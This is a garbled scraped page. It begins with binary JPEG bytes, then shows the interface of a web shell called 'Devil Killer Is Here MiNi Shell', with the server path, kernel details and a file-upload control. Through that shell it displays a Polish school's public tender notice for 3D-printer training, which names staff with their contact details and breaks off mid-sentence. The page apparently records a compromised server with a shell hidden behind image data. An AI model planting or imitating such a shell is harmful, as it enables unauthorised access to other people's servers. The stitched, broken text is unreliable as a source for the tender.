JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0004028801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa organizacji i przeprowadzenia szkolenia uczniów Zespołu Szkół Nr 18 we Wrocławiu z obsługi drukarki 3D w ramach cyklu zajęć przygotowujących do egzaminów zawodowych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół nr 18</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 932820931</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Młodych Techników 58</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">53-645</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">e.wachowska@zs18.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zs18.wroc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa organizacji i przeprowadzenia szkolenia uczniów Zespołu Szkół Nr 18 we Wrocławiu z obsługi drukarki 3D w ramach cyklu zajęć przygotowujących do egzaminów zawodowych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38d23885-802c-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00040288</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00007432/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Organizacja i przeprowadzenie szkolenia uczniów Zespołu Szkół nr 18 we Wrocławiu z obsługi drukarki 3D w ramach cyklu zajęć przydotowujących do egzaminów zawodowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Zawodowa 18”, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/<br/>https://epuap.gov.pl/wps/portal<br/>http://www.zs18.wroc.pl/<br/>e.wachowska@zs18.wroc.pl<br/>piotr.lusar@zs18.wroc.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/), ePUAPu (https://epuap.gov.pl/wps/portal)<br/>oraz poczty elektronicznej (e.wachowska@zs18.wroc.pl).<br/>2. Zamawiający wyznacza do kontaktu z Wykonawcami P. Elżbietę Wachowską-Karaśkiewicz –Wicedyrektora Zespołu Szkół Nr 18, e-mail: e.wachowska@zs18.wroc.pl<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>„Formularzy do złożenia, zmiany, wycofania oferty lub wniosku”, „Formularza do komunikacji”.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów lub oświadczeń oraz informacji przekazywanych przy ich użyciu,<br/>opisane zostały w „Regulaminie korzystania z miniPortalu” oraz w „Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP)”.<br/>5. Wykonawca przystępując do niniejszego postępowania, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się, korzystając z miniPortalu, przestrzegać postanowień tego regulaminu.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy wynosi 150 MB.<br/>7. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na<br/>ePUAP (poza tymi dokumentami i oświadczeniami, które przekazywane są za pomocą poczty elektronicznej – i których przekazanie tą metodą zostało dopuszczone w niniejszej swz).<br/>8. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do<br/>zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu - w szczegółach danego postępowania.<br/>9. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>10. Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu, w zakresie wskazanym w rozdz. VIII ust. I pkt 1 swz oraz rozdz. XIII ust. 9 swz, w formie elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.<br/>11. W postępowaniu korespondencja pomiędzy Wykonawcą a Zamawiającym (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal („Formularz do komunikacji”)<br/>– z zastrzeżeniem ust. 13. Korespondencja przesłana w ten sposób nie może być szyfrowana.<br/>12. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem postępowania (ZS18.PZ18.3.22) lub numerem ogłoszenia (BZP) lub ID postępowania.<br/>13. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: e.wachowska@zs18.wroc.pl (lub piotr.lusar@zs18.wroc.pl) i dopuszcza dopuszcza możliwość składania dokumentów<br/>elektronicznych w ten sposób.<br/>14. Sposób sporządzenia dokumentów elektron. musi być zgodny z wymaganiami określonymi w rozp.<br/>Prezesa Rady Ministrów z dnia 20 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozp. Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>(...)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zespół Szkół Nr 18 z siedzibą we Wrocławiu<br/>przy ul. Młodych Techników 58, 53-645 Wrocław, e-mail: szkola@zs18.wroc.pl tel. 71 798 68 93<br/>(kontakt możliwy w godzinach od 8:00 do 15:00, od poniedziałku do piątku).<br/>2. Inspektorem Ochrony Danych w Zespole Szkół Nr 18 we Wrocławiu jest Pan Tomasz Grzybowski,<br/>tel. 501-083-482, e-mail: tomasz.grzybowski@coreconsulting.pl, CORE Consulting sp. z o.o., ul.<br/>Wyłom 16, 61-671 Poznań.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego nr ZS18.PZ18.3.22,<br/>prowadzonym w trybie podstawowym z możliwością negocjacji (art. 275 pkt 2 ustawy Pzp.<br/>4. Podane przez Panią/Pana dane mogą być ujawnione: firmom utrzymującym i serwisującym nasze<br/>serwery informatyczne, kancelariom prawnym, firmom obsługującym nas w obszarze IT, w tym<br/>serwisującym urządzenia, podmiotom utrzymującym oprogramowania, z którego korzystamy w<br/>bieżącej działalności. Odbiorcami Pani/Pana danych osobowych mogą być również osoby lub<br/>podmioty, którym udostępnione zostaną informacje dotyczące postępowania, które jest jawne – z<br/>zastrzeżeniami wynikającymi z art. 18 ust. 3-6 oraz art. 74 ust. 3 ustawy z dnia 11 września 2019r. –<br/>Prawo zamówień publicznych, dalej jako: ustawa PZP. Udostępnieniu mogą podlegać wszystkie dane<br/>osobowe, z wyjątkiem danych szczególnych kategorii – określonych w art. 9 ust. 1 RODO, zebranych w<br/>toku postępowania o udzielenie zamówienia.<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy.<br/>6. Podanie danych jest niezbędne do uczestnictwa w postępowaniu o udzielenie zamówienia<br/>publicznego. Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem wynikającym z<br/>ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Konsekwencje niepodania określonych danych wynikają z ustawy PZP.<br/>7. Pani/Pana dane osobowe nie będą podlegały profilowaniu ani zautomatyzowanemu podejmowaniu<br/>decyzji.<br/>8. Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO – prawo dostępu do Pani/Pana danych osobowych;<br/>− na podstawie art. 16 RODO – prawo do sprostowania Pani/Pana danych osobowych,<br/>− na podstawie art. 18 RODO – prawo żądania od nas ograniczenia przetwarzania danych osobowych,<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa, tel. 22 531-03-00, e-mail: iod@uodo.gov.pl, www.uodo.gov.pl, gdy uzna Pani/Pan, że<br/>przetwarzanie przez nas danych osobowych narusza reguły przetwarzania danych osobowych.<br/>9. Nie przysługuje Pani/Panu:<br/>− prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; − na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani - na podstawie art. 16 RODO – prawo do<br/>sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub<br/>uzupełnienia danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego, zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z ustawą PZP oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>- na podstawie art. 18 RODO – prawo żądania od nas ograniczenia przetwarzania danych osobowych,<br/>z zastrzeżeniem, że nie ogranicza to przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia. W przypadku, gdy wniesienie żądania spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego<br/>protokołu, od dnia zakończenia postępowania o udzielenie zamówienia nie będziemy udostępniać tych<br/>danych, chyba że zajdą przesłanki, o których mowa w art. 18 ust. 2 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZS18.PZ18.3.22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa organizacji i przeprowadzenia szkolenia uczniów Zespołu Szkół Nr 18 we Wrocławiu z obsługi drukarki 3D w ramach cyklu zajęć przygotowujących do egzaminów zawodowych (zwanych dalej „szkoleniami”).<br/>2.	Szkolenie realizowane jest w ramach projektu pn. „Zawodowa 18”, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020, Osi Priorytetowej 10 Edukacja, Działania 10.4 Dostosowanie systemów kształcenia i szkolenia zawodowego do potrzeb rynku pracy, Poddziałania 10.4.1. Dostosowanie systemów kształcenia i szkolenia zawodowego do potrzeb rynku pracy – konkursy horyzontalne.<br/>3.	Przedmiotem zamówienia jest przeprowadzenie 90 szkoleń z obsługi drukarki 3D, po jednym dla każdej z dziewięćdziesięciu 2-osobowych grup uczestników – uczniów Zespołu Szkół Nr 18 we Wrocławiu, kształcących się w zawodach: <br/>1)	technik elektryk, <br/>2)	technik mechanik, <br/>3)	technik mechatronik, <br/>4)	technik chłodnictwa i klimatyzacji<br/>5)	technik urządzeń i systemów energetyki odnawialnej. <br/>- przy czym za 1 szkolenie należy uznać organizację i przeprowadzenie szkolenia dla jednej 2-osobowej grupy w wymiarze 16 godzin dydaktycznych (zwanym dalej „szkoleniem”).<br/><br/>4.	Usługa realizowana będzie w sumie dla 180 osób w podziale na dziewięćdziesiąt 2-osobowych grup w łącznym wymiarze 1 440 godzin - dla każdej grupy po 16 godzin dydaktycznych.<br/>5.	Wykonawca przeprowadzi szkolenia, o których mowa w ust. 3 swz, zgodnie z programem obejmującym zapoznanie uczestników szkolenia z budową i zasadami obsługi drukarki 3D oraz wykształcenie u uczestników szkolenia umiejętności drukowania na drukarce 3D zaprojektowanych przez nich na zajęciach szkoleniowych drobnych elementów konstrukcyjnych, wynikających z podstawy programowej kształcenia odpowiednio w zawodzie, w którym się uczą, tj. dla technika elektryka lub technika mechanika lub technika mechatronika lub technika chłodnictwa i klimatyzacji lub technika urządzeń i systemów energetyki odnawialnej.<br/>6.	Wykonawca zobowiązany będzie przedstawić program szkolenia Zamawiającemu, na co najmniej 7 dni roboczych przed rozpoczęciem szkolenia.<br/>7.	Wykonawca zobowiązany jest w pierwszym dniu zajęć szkoleniowych, przed ich rozpoczęciem, do zapoznania uczestników danego szkolenia z jego programem.<br/>8.	Szkolenia realizowane będą dla każdej osoby w formie wspólnych, grupowych, 2-osobowych praktycznych zajęć - wyłącznie na terenie Zespołu Szkół Nr 18 we Wrocławiu, z/s przy ul. Młodych Techników 58.<br/>9.	Zamawiający zapewni każdorazowo do przeprowadzenia zajęć szkoleniowych pracownie kształcenia zawodowego lub pracowanie informatyczne wyposażone w dwa stanowiska - zestawy komputerowe z wymaganym oprogramowaniem informatycznym i specjalistycznym zawodowym, wykorzystywanym w nauce zawodów, o których mowa w ust. 3 swz oraz dwie drukarki 3D.<br/>10.	Model wykorzystywanych podczas szkolenia drukarek 3D, Zamawiający przedstawi Wykonawcy na co najmniej 14 dni roboczych przed rozpoczęciem szkolenia.<br/>11.	Wykonawca zobowiązany jest do zapewnienia niezbędnych do przeprowadzenia zajęć szkoleniowych materiałów eksploatacyjnych do drukarek 3D, służących realizacji programu szkolenia.<br/>12.	Szkolenia mają być realizowane każdorazowo w pełnym zakresie czasu ich trwania, o którym mowa w ust. 13 swz, w formie zajęć praktycznych z korzystaniem przez każdego uczestnika szkolenia z indywidualnego stanowiska - zestawu komputerowego z dostępem do oddzielnej przypisanej do niego drukarki 3D. <br/>13.	Szkolenia powinny trwać dla każdej z dziewięćdziesięciu grup po 16 godzin dydaktycznych. Przez 1 godzinę dydaktyczną szkolenia Zamawiający rozumie 45 minut. Do czasu 16 godzin dydaktycznych szkolenia nie wlicza się przerw.<br/>14.	Szkolenia, o których mowa w ust. 13 powinny być zrealizowane dla każdej z 90 grup w ciągu jednego miesiąca w układzie 4 spotkań, każde spotkanie odbywające się w innym dniu i trwające po 4 godziny dydaktyczne.<br/>15.	Szesnastogodzinny cykl szkoleniowy, o którym mowa w ust. 13 i ust. 14, dla danej grupy szkoleniowej realizowany będzie przez jedną i tą samą osobę szkolącą, wskazaną przez Wykonawcę na etapie planowania realizacji usługi w danym miesiącu.<br/>16.	W sytuacji zaistnienia przesłanek, mających wpływ na brak możliwości realizacji usługi w sposób zaplanowany w ust. 15, zastosowanie będą miały zapisy, o których mowa w ust. 25 swz.<br/>17.	Zamawiający zapewni każdorazowo ubezpieczenie uczestników podczas ich pobytu na zajęciach szkoleniowych.<br/>18.	Podczas realizacji szkolenia Wykonawca zobowiązany będzie do prowadzenia, dla każdej z dziewięćdziesięciu grup, dziennika zajęć szkoleniowych, którego wzór otrzyma od Zamawiającego przed rozpoczęciem ich realizacji.<br/>19.	Zamawiający zastrzega, że w przypadku uzyskania przez Wykonawcę punktów w kryterium jakościowym w związku z wykazaniem przez Wykonawcę osób spełniających opisane w rozdz. XVII ust. 7 swz, jakościowe kryteria oceny ofert, usługę szkoleniową zobowiązane są przeprowadzić te właśnie osoby.<br/>20.	Wykonawca sporządzi i przekaże każdemu ze 180 uczestników szkoleń zaświadczenie potwierdzające ukończenie przez niego 16-godzinnego szkolenia. Zaświadczenia sporządzone zostaną zgodnie z obowiązującymi wymogami dotyczącymi oznakowania działań współfinansowanych ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020.<br/>21.	Wykonawca może realizować usługę w dni powszednie w godzinach 8:00-18:00. <br/>22.	Zamawiający dopuszcza - w szczególnie uzasadnionych przypadkach - możliwość realizacji przez Wykonawcę usługi w soboty lub podczas dni wolnych od nauki (ferii świątecznych, ferii zimowych, wakacji) w godzinach 8:00-16:00 - po wcześniejszym wyrażeniu zgody na taką realizację szkoleń przez uczestników szkoleń i Zamawiającego. <br/>23.	Harmonogram realizacji usługi przekazywany będzie Wykonawcy przez Zamawiającego każdorazowo do 15. dnia miesiąca poprzedzającego miesiąc, w którym usługa zaplanowana będzie do realizacji. Natomiast potwierdzanie przez Zamawiającego i Wykonawcę, uzgodnionych dokładnych tygodniowych terminów realizacji usługi, odbywać będzie się każdorazowo w piątek poprzedzający dany tydzień realizacji usługi. <br/>24.	Zamawiający zastrzega sobie możliwość planowania i równoległej realizacji usługi dla dwóch grup szkoleniowych - bez możliwości negocjacji zmiany tego sposobu realizacji usługi przez Wykonawcę. <br/>25.	W sytuacji nieodbycia się zajęć pomimo dochowania terminów, o których mowa w ust. 23 swz, z przyczyn niezależnych od Zamawiającego i Wykonawcy, zaległe zajęcia muszą zostać przeprowadzone we wspólnie ustalonym terminie, nie później jednak, niż do 7 dni od pierwotnie planowanej daty ich realizacji.<br/>26.	Zamawiający zastrzega, że powyższy sposób planowania i realizacji usługi nie podlega możliwości negocjacji zmiany tego sposobu realizacji usługi przez Wykonawcę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">490 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.	Zamawiający przewiduje możliwość udzielenia 